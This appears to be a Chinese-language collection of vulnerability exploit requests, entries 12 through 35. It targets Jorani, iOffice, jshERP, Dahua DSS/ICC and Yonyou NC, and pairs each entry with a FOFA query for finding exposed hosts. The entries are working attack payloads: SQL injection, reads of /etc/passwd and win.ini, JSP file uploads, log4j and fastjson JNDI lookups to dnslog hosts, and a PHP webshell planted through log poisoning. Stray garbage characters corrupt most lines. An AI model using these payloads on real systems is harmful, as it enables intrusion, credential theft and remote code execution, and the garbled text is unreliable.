GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.10 M$ w3 C" U s5 d3 ^& |+ q
Host: 127.0.0.1
) L$ R2 }7 ]2 {% aPragma: no-cache9 S# Z& _" Z' F5 Z% N; M, I5 f8 U9 P
Cache-Control: no-cache
' k0 L/ {+ N4 e, B9 P+ q0 ZUpgrade-Insecure-Requests: 1
( t7 z, _; m0 b8 a' K" u9 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- d8 W% w" ? ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: Z+ N/ t c e6 [9 x
Accept-Encoding: gzip, deflate6 E* v4 `: H: r$ _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
; D: Q: r! g5 W; x8 {* H8 A% _$ R( OConnection: close
+ n# l. F0 P4 ^9 J$ A6 v% d( B) w* M( J( ^: B! h; E1 R% J2 q
' W* P& i) `4 M9 g: m5 v% m
12. Jorani < 1.0.2 远程命令执行5 m [+ S+ M% }
FOFA:title="Jorani"
" U& }% H3 j" M- r9 Z8 m* U1 y第一步先拿到cookie1 s% u0 A. X, L( z/ e% a0 m
GET /session/login HTTP/1.1+ d; \% ?) ~6 x$ Z. S- t6 S
Host: 192.168.190.308 W1 y; b& m; c0 w" b4 n- f7 y4 _( \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36' ^/ o/ h1 v( N/ }
Connection: close
x7 T0 e8 G- b2 s: RAccept-Encoding: gzip6 O" N" s2 ` X$ O
$ {. q* ^- x2 h
5 u/ i& s. I1 v4 @ r8 b, ~7 i* ~7 d
响应中csrf_cookie_jorani用于后续请求4 S5 }6 L5 [2 }6 G7 U# b; | L
HTTP/1.1 200 OK
+ r, z+ h& Y4 J1 K/ ?3 m7 }& R, u3 JConnection: close
3 K, K( M }) g, Z0 v9 J XCache-Control: no-store, no-cache, must-revalidate
+ S# Y: o& L/ L) GContent-Type: text/html; charset=UTF-8
X2 |5 ?( p/ z+ pDate: Tue, 24 Oct 2023 09:34:28 GMT; q/ i+ H8 K1 { K
Expires: Thu, 19 Nov 1981 08:52:00 GMT7 w q/ T+ Q$ ^# L
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
% y& s" v" O. v( O+ m( sPragma: no-cache! i* m q! a/ S; o6 ^4 s. P2 d& ]
Server: Apache/2.4.54 (Debian)
0 F% X, A$ \" R/ l" @Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/% D& X: L1 Z: m9 H# K+ _+ G
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
2 [- e2 i% Y' X6 u5 eVary: Accept-Encoding
" Q1 P6 j9 `/ c$ b
6 c, i2 @5 ~6 d$ C* E5 k
8 y* P% q* {' |# O# `7 j7 OPOST请求,执行函数并进行base64编码4 A5 M, g6 H2 y# j4 k% M
POST /session/login HTTP/1.1
- R/ k5 b+ k* f* l) k9 pHost: 192.168.190.30; q& ~* r( M% t9 J' {3 u0 n% D3 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 n O3 L" X9 l1 V V! k* f
Connection: close
" T l( G+ y" Y' [. T0 h' R bContent-Length: 252
- r8 @# F# B5 O. d, ?# B; uContent-Type: application/x-www-form-urlencoded
1 x# G% S4 p' t0 W- R7 Y( pCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
* w3 M1 Z6 J% F" o' J; T# eAccept-Encoding: gzip" e U2 G4 v( e7 K9 v
- J6 ~1 J7 W; Ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
$ j- ?. u& Z8 X# k, u$ ~6 Q- S! K1 H$ ?: S# }
: M. ^0 L( t8 d. z
- i- c% n/ X& z1 l向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- H1 D8 X" W& x7 b/ ^1 y- H4 k
GET /pages/view/log-2023-10-24 HTTP/1.1
% B; p0 C" v; y; Z3 KHost: 192.168.190.308 J0 s/ N3 g5 J# H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" p) k" k9 T. U, a; g3 e- R |Connection: close% c- Y5 ^1 ]8 P' k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
4 Y* e& _" F& k8 jK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
3 J/ s( O$ j1 ]3 d: g" H" xX-REQUESTED-WITH: XMLHttpRequest1 }9 }0 J& e; i' n( \8 g
Accept-Encoding: gzip
4 z( J. M5 N- o
3 w F& n* d/ f/ p
- P7 w5 f ^5 B) T) \8 z13. 红帆iOffice ioFileDown任意文件读取9 k7 y a! |/ t ^8 e
FOFA:app="红帆-ioffice"4 k$ T* I9 S" j# y
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1* V- B! q4 h6 u; P
Host: x.x.x.x) U0 \2 ?9 o( Z6 T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 R7 S7 S# `% R% y! H0 F7 r& P8 k* \) t
Connection: close
, ?* g% |, Q( o0 G) B2 N7 C9 CAccept: */*
9 m1 A: ~. g, v# z* X- t% M/ ]Accept-Encoding: gzip
9 ]3 U# L4 R7 F J4 T" h3 S, b/ {
. Z% D- f0 ^7 D/ R( h
0 I5 U, W( D X% Y0 f14. 华夏ERP(jshERP)敏感信息泄露
( k& A2 y* h' L. p+ KFOFA:body="jshERP-boot"$ a( w' W' ~, G, q7 P6 O9 e
泄露内容包括用户名密码
- F G' f5 m7 i$ rGET /jshERP-boot/user/getAllList;.ico HTTP/1.1/ U3 l6 @, N2 o2 i
Host: x.x.x.x7 H% x, U4 i) x1 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 ~+ T# L) f0 t6 m& N2 TConnection: close2 v& D: \! @: _1 Z
Accept: */*4 w. Z* P; B, t% m- t
Accept-Language: en I' H$ V2 F+ ?* }$ j
Accept-Encoding: gzip
, v0 C& v8 k4 x& }/ Q" ~/ J; b# t3 l0 _/ H" j1 G
3 r8 b) @( d4 J* m0 a9 C9 O* Y15. 华夏ERP getAllList信息泄露
' s& z4 o J6 z- N: g5 ZCVE-2024-0490 W1 T, F- G9 I; [
FOFA:body="jshERP-boot"4 z; x% w! d; G; U9 |* E3 ?) x6 m
泄露内容包括用户名密码
+ _0 y7 m; x1 Z# [GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
5 q+ a$ F( T$ w9 UHost: 192.168.40.130:100
( d$ o! v/ l' U2 \, e! C2 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
( W |* }% T9 vConnection: close/ ]5 [5 L3 m' Y% q0 ?. F
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
- k0 } h3 d X+ g5 j4 L/ OAccept-Language: en
' J$ @7 [9 z/ B ysec-ch-ua-platform: Windows
% {, C- u: _; o, d7 U3 b( M+ mAccept-Encoding: gzip& X, V! o9 P6 y
# q% n3 G0 M3 Y8 D) }' X/ s% d! m. L0 o2 w& x, {& e7 K
16. 红帆HFOffice医微云SQL注入% D" G9 T; j" {2 M* R% J3 k7 E
FOFA:title="HFOffice"* L q l) w7 y5 ?
poc中调用函数计算1234的md5值
7 O: S. n; k2 m8 J. J% x6 RGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
' g7 T4 z4 X& R6 `Host: x.x.x.x& w/ W( G+ m c) h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 a" t/ I: Y" _
Connection: close& m% h/ `( ?- }3 D4 A
Accept: */*$ ]* e, m' n; A& c) I5 g5 F
Accept-Language: en
, ?4 [& P! w L1 z, BAccept-Encoding: gzip. b. p1 X; r; u) J
u% B3 d. f2 _- i" u
$ z; W; V% W. z! X4 i( i17. 大华 DSS itcBulletin SQL 注入# I8 ]- G+ ?6 N. U" v) K0 L
FOFA:app="dahua-DSS"
( B" s& Q( M9 E# N% t! mPOST /portal/services/itcBulletin?wsdl HTTP/1.1
9 s) B$ ~ H4 ~, i3 ZHost: x.x.x.x
/ Y* p. i) I/ H0 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 O) j# T! k' g& C. s' V
Connection: close
4 a3 _9 e; `. B2 |8 l0 [Content-Length: 345
0 h6 q+ K/ |8 w# O; [0 ^) a& UAccept-Encoding: gzip0 W( k* y% O: V
8 |# D, j6 v2 c; l9 o<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'># L6 M! o$ V% x2 |) Y6 l3 L. b
<s11:Body>
U( n6 n, y, f) Q <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ |% `: }( c/ j, `9 s
<netMarkings>
* W. T8 h n- W _ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1. O4 p, t( s1 J3 G4 M3 I2 d& J
</netMarkings>
6 ^" W3 M2 E) b Q </ns1:deleteBulletin>
* c( c- ^6 |$ p" y" e1 y, b' } </s11:Body>+ d6 B9 a! Q& z6 L* r( r
</s11:Envelope>
2 U( n0 b1 p7 \3 m) q+ \1 |- V$ o9 ?* f. S* K! z" }
) }/ \. A8 n* @/ H; }
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- e3 ~9 \! t: p+ nFOFA:app="dahua-DSS"
Q+ _4 |# @- iGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
( B- e8 J+ V$ X, }% oHost: your-ip
: w$ U: L, i' c! RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 y; A6 Y# _4 U" X- u4 OAccept-Encoding: gzip, deflate* Z1 `2 y! E4 S' b2 I* I
Accept: */*1 |7 r8 c: Y1 x# U
Connection: keep-alive
4 r q& o: g9 B2 G v" p/ \+ i7 ^1 G9 G5 J2 R
" H# y& A+ C7 q
2 w/ x) k9 B5 i( o l9 @
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
! \1 ~; p" @. j- W1 [+ c% SFOFA:app="dahua-DSS"1 ]' e" @4 J+ {
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
`; @4 q. v" n6 kHost:
. \8 ~2 U# o! L2 AUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 P. \9 d# [3 X$ f' I1 S e
Accept-Encoding: gzip, deflate
6 b: i, J! v3 S$ T, _8 S: pAccept: */*
+ b+ q4 h; n9 k/ EConnection: keep-alive- a' q0 j9 g8 }1 k
9 ?7 G9 u# T& G1 c* r1 E$ M' r
$ y6 ^* o4 ?! G- a( r- t* U, t
20. 大华ICC智能物联综合管理平台任意文件读取
7 @" j- u, M5 G9 AFOFA:body="*客户端会小于800*"" C% B* V1 g0 l/ q* d3 E
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 e2 `! n% b. Z8 P
Host: x.x.x.x
% J. G& g, ^2 J L8 b, z EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 T+ s m1 n% Z8 iConnection: close
6 X! F: N0 a' i# u2 sAccept: */*
5 Q* O. a d! \' c: t4 sAccept-Language: en
/ @# k% {, X. c1 Q' i* jAccept-Encoding: gzip. M5 ~* A: ^- B# ?
& j' d0 _5 S% Y8 P% Q
- T1 q6 }% f1 C4 \
21. 大华ICC智能物联综合管理平台random远程代码执行7 S/ u6 D* y9 n x" l6 |; |, ^- ?$ |
FOFA:icon_hash="-1935899595"
, H( B) }% d2 Q0 z( d [) P; OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
8 n3 f6 x& @! Z- Y# b; N" sHost: x.x.x.x
! t7 @1 M( B# f" b+ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 ] L1 p4 C; r2 x" o
Content-Length: 161
6 C/ r" C) T) O: o' h) B3 ?Accept-Encoding: gzip
: |% a7 y- t6 ^" v# L& L# N6 F2 BConnection: close2 l: t8 }: k# {" j/ Z3 v( N% g% [) c, w
Content-Type: application/json;charset=utf-81 g5 U/ y0 e7 N. `* Y& T
( q& Y; X2 _' W. o' w$ F{
2 T/ `. `, _. d. F/ q7 D"a":{* o: ]( H- V+ a& g
"@type":"com.alibaba.fastjson.JSONObject",
- j0 E4 K( M1 V+ m {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}: b C+ a$ ?6 k5 W
}""
h- Y* b0 g* s. Z7 h) g3 @}& P1 f9 v' q8 P( u
0 e- R& h: \3 M! _
9 c& p+ l3 N. V& [9 f$ n8 B% g) o22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 n% G* {7 w. N* ^2 E4 e
FOFA:icon_hash="-1935899595"
. h7 g; p/ b! A" [& LPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
* c3 _: ~& Y5 K* ?- L" tHost: your-ip
+ F0 X: G) p8 b3 R+ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ ~0 Z+ D" g6 K0 V5 bContent-Type: application/json;charset=utf-8) `0 h) x: M1 h
v) L# h8 ]0 w# a5 l' b6 ]# L8 R
{$ `- \ o- D D+ a
"loginName":"${jndi:ldap://dnslog}"
q, `8 O* A9 n1 D4 H: q" `}) n* B) L, ]5 t, {0 \0 M0 X# I
* I* S' T1 j- w( a
2 @+ a3 r3 g/ r$ H2 T/ e- p% c* p
& R" n' c# ?7 i% ~7 [0 b23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 M0 E, V3 H5 g- b$ @4 L1 C$ F% _" SFOFA:icon_hash="-1935899595"5 f! x G$ Z$ x$ N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 [/ {2 a$ V0 c! V
Host: your-ip
6 \9 k. u0 T; [# x$ FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. f; R' f5 j8 C3 O3 k) L. ]' M, X/ S: H
Content-Type: application/json;charset=utf-85 f8 p+ K# _9 y6 c4 e' M. v
Accept-Encoding: gzip* t$ O! {/ e4 W: _. f9 p9 p% W
Connection: close
6 Z' U% T7 K5 D+ l2 F2 H$ H p& R I2 P0 }8 P
{
+ z k# F9 Q! q "a":{
) q2 E+ ^6 x- n "@type":"com.alibaba.fastjson.JSONObject",
7 O* ~+ G. L V( f2 B+ V$ S {"@type":"java.net.URL","val":"http://DNSLOG"}& w, H$ M. M/ I* D
}""
; m7 _# F, l' J}
. z. r# b. \$ G5 ]& R7 L! `
. ?7 ]3 j/ e3 N# \* t* a+ j4 V; N* N/ a9 S5 B- _
24. 用友NC 6.5 accept.jsp任意文件上传1 c9 Z. A2 M% P" s
FOFA:icon_hash="1085941792"
+ n& i, G% x4 tPOST /aim/equipmap/accept.jsp HTTP/1.1# a6 N0 F K n
Host: x.x.x.x
! j+ v6 J, s" j1 c) i+ x1 HUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( {# e* Z2 g I& \8 \5 X3 u$ X6 @
Connection: close
3 d; ]1 |' X2 X% iContent-Length: 449
/ B; A3 s$ W* ^4 KAccept: */*8 B: ~; U# L9 A
Accept-Encoding: gzip" G! A5 R5 A3 m1 J2 A! Y* t
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc8 M) X, T% ]* q6 n% v' X
& I$ y, t& X; m9 k5 {9 l1 q$ c-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. j; a; ~3 m: q- a' h! ?Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"0 j' U3 n. N: r* i
Content-Type: text/plain
- R" y+ b$ G9 r& @, j2 }7 h7 V/ a$ d& {& R
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %> ?: n9 G& Q, W" A1 K7 U
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. @% `8 D9 e, S; @; }! o% N0 l
Content-Disposition: form-data; name="fname"
, k" _% q2 b6 Z( c+ R. a0 {
. L; J/ R/ V0 y" K- v\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp5 \" {( T1 R' L6 M' N
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( L7 h* o9 r0 e6 A" g! S
& { {1 F+ h( ^7 z ~ m
3 N2 n! v: i# W3 q8 l25. 用友NC registerServlet JNDI 远程代码执行
7 U8 _: T) f3 p+ @5 TFOFA:app="用友-UFIDA-NC"
2 d0 v% o v" S3 M4 ?POST /portal/registerServlet HTTP/1.1
X; x e Z" T1 v5 I% e b, B; SHost: your-ip/ }- S& v `! s! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.09 E! z# Z$ b R* {' Y! C7 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.96 [1 I4 W$ h2 H0 `, Z+ }
Accept-Encoding: gzip, deflate3 {1 b6 }) U$ L7 i
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6- x) L: x* p% t7 R
Content-Type: application/x-www-form-urlencoded8 q* T) R' r: N' i/ V. k8 J) Q7 ]! Y2 a5 ?
% O) |7 j* @+ M
type=1&dsname=ldap://dnslog
8 C* ^% z) }- Z
+ `" J1 r% r1 {2 ~/ }8 E( }9 z) F$ J% O/ T) t8 S
; J5 y3 x- W& [, c% L26. 用友NC linkVoucher SQL注入5 w# j5 y ]0 ]! U2 |
FOFA:app="用友-UFIDA-NC"$ b* V* Y& I. P' v
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.16 t/ ~$ L; k* j- G
Host: your-ip& f$ r8 r' f/ v9 W+ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 x9 J: t; @9 {1 k6 I$ jContent-Type: application/x-www-form-urlencoded
5 f) n6 k5 p* {7 O7 ^" E5 uAccept-Encoding: gzip, deflate' q4 T2 }7 C0 {! k* Z
Accept: */*
$ c0 k& R3 C, }) j9 dConnection: keep-alive7 o& J% t( q2 w" H
+ v0 c. H& i2 T8 H8 i% L. _! [+ P4 W& ]& n0 P
27. 用友 NC showcontent SQL注入8 D+ i& C6 m& K
FOFA:icon_hash="1085941792"
$ w& b' B1 u( {) ~GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
+ j1 ~5 T( K# u j& U8 m% jHost: your-ip, N$ N* @) f5 k8 e* j+ s$ [) I# O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" a" ]3 ~9 h7 h4 C/ O/ k7 H
Accept-Encoding: identity
4 J3 o9 x7 a1 s" RConnection: close* w* S; n/ J$ c G/ ]
Content-Type: text/xml; charset=utf-8
( w$ u- ]7 n$ v6 [' Y
0 e7 @7 `* ]' I" T* y, ?6 M" ]6 _
28. 用友NC grouptemplet 任意文件上传
5 V* ?0 w7 E$ O! {$ z) K5 |+ F" @FOFA:icon_hash="1085941792"- h: I. u# W' C" Y8 O2 s' U- D
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1" R! N* l( O9 F3 ^# x% d+ d2 W; z
Host: x.x.x.x7 Y$ x# u2 ]! S. z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
" p/ ]' q0 U" H4 t& fConnection: close5 r6 Z; H5 L3 E1 f8 ]" E, J/ h F
Content-Length: 2685 \- J0 T" O7 j- A/ Q
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
$ f, Z0 R5 M3 W: nAccept-Encoding: gzip
j5 U4 ?4 b0 Q7 E: {# F
. ~( h$ k. y# {4 R) p- l# |5 K0 A+ S% B------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
5 g* W9 k7 T2 s/ E4 YContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"& x' ~9 {3 o. K% E
Content-Type: application/octet-stream
% w; V# _% |5 q( V+ u# u
0 g, V3 G( ^$ _& @<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
# E! S& M7 G+ ~ x+ K8 U/ @------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--. A% L, o4 S: r8 i# z
7 N- b8 E* \" U- f p
* V' b7 A, [; j* c
/uapim/static/pages/nc/head.jsp
: A' A8 {: L: ?" H" m3 O: o# s2 Z
7 R1 Q$ U" n k3 X, Y8 i29. 用友NC down/bill SQL注入
. Z! Z- g; D* J( x' H4 t' `- ~ tFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& N Y" ]; L* O: X
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 w/ r) i: o, N2 }4 iHost: your-ip
! Y" {/ _! b1 d$ Z: F4 K H: gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 i1 R" A7 b( F0 j _
Content-Type: application/x-www-form-urlencoded1 y% ?3 C* r- H* t& l
Accept-Encoding: gzip, deflate
$ w" H0 w$ B- P+ F" M, a3 ^Accept: */*# k6 F) x n- C' d: l8 g
Connection: keep-alive
4 p. |2 D' k4 ?2 x6 Q4 B/ J) z5 G) M- q A
Q( O( d; a. ~/ Q30. 用友NC importPml SQL注入
* |7 g8 W5 a9 Y8 R$ {FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
q- A6 _# [6 C; E6 A$ OPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
; g9 k6 P% ~, F+ iHost: your-ip; f! T: J( C' w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
" b$ W2 M$ I, G0 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! Y6 \+ Y: P. g# X8 ~Connection: close( R& W4 H7 N5 S3 P& `
3 k- e# I8 M/ Z$ B8 L
------WebKitFormBoundaryH970hbttBhoCyj9V4 ~9 |0 J7 Q1 f+ B$ I" W
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"7 ]3 h) x# A, d* T! l$ m
Content-Type: image/jpeg
5 w* W& \5 `. B" ]% U# E* A' v------WebKitFormBoundaryH970hbttBhoCyj9V--
+ d N8 J+ s/ s8 o
; W# {* {. Z9 l8 k+ ^0 |# g1 _4 Y; q( O0 T* O; f" A4 p7 ^
31. 用友NC runStateServlet SQL注入
% Y, w( e; w; @version<=6.5$ W% a+ w8 n; M6 x- G" o7 q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif". A* B0 Q# M/ `+ f
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- }' X5 x. }; W) {Host: host1 F2 g, v! S4 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 t6 z1 I- \& p1 [" y: MContent-Type: application/x-www-form-urlencoded& K6 o/ j5 B, J+ A6 D& x
& I; M' c, U& f+ d4 i6 e* j# b1 Z/ O0 J% `
32. 用友NC complainbilldetail SQL注入9 }% Y7 L0 \9 d
version= NC633、NC65, y4 z \5 O7 C
FOFA:app="用友-UFIDA-NC"- u/ Q& u P; v7 A7 u4 z& y; @
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) ?. j9 p" v$ N3 D6 YHost: your-ip
: j# m+ q) `8 ~; c y* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 [7 m. M. i7 }6 Z( H
Content-Type: application/x-www-form-urlencoded
0 }7 N) v6 f c' d+ E5 pAccept-Encoding: gzip, deflate
8 G, `+ H$ E7 [' O" U- |% IAccept: */*
X Y) m% m" d9 cConnection: keep-alive
# L+ E( R, f" d" f( Q4 J" K. ^$ a5 ?* [, k/ H0 I* c9 G& g' M1 B
9 s2 G. q0 {, b8 W1 A% e! w) y
33. 用友NC downTax/download SQL注入
6 V) C9 p8 g( P9 ]+ Sversion:NC6.5FOFA:app="用友-UFIDA-NC", \# ]7 ]- N0 q, S+ Y$ @
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! H* L1 v: j, d, G. Q4 w [Host: your-ip2 v( r2 y( U# N: p3 e* t m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 [. g6 }8 h- M: @ S, x
Content-Type: application/x-www-form-urlencoded! b* E9 r; m6 m! m; F
Accept-Encoding: gzip, deflate. @; D" J' v4 v' `
Accept: */*
4 r# \ x7 J* B3 uConnection: keep-alive
+ X6 F7 x" ~' Q9 n$ Z) S
9 ]7 a0 W2 \4 ~9 k' n0 D3 w
. S' C7 d/ G0 s J q, @) k34. 用友NC warningDetailInfo接口SQL注入4 H- `1 U, N0 Y( F; m- A3 Q: q8 f
FOFA:app="用友-UFIDA-NC"
; T+ W: _2 t. iGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ [# Y* E* B0 t' p% U" d. oHost: your-ip
) W1 u8 _0 Z! ~0 A1 y; ?$ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 z6 E) L. i$ ]2 R# _5 T; d# W
Content-Type: application/x-www-form-urlencoded% y, ]. g- U J5 [
Accept-Encoding: gzip, deflate5 ^$ p% z$ p5 Y. _
Accept: */*8 @1 F0 e) V" C: m+ I
Connection: keep-alive
8 K3 \' ?- H* d1 B; u8 ?
/ @! b& A% X% N) [, |# w( n. f7 a
7 N& v9 b6 V# |( c' [35. 用友NC-Cloud importhttpscer任意文件上传1 y- Y1 g- d0 H- w: I
FOFA:app="用友-NC-Cloud"
0 b$ P# X- a/ j# @. A5 lPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.11 Z" Y' c3 Y: [; F; }6 c
Host: 203.25.218.166:8888: p5 b1 m# u" Q; ?+ A
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
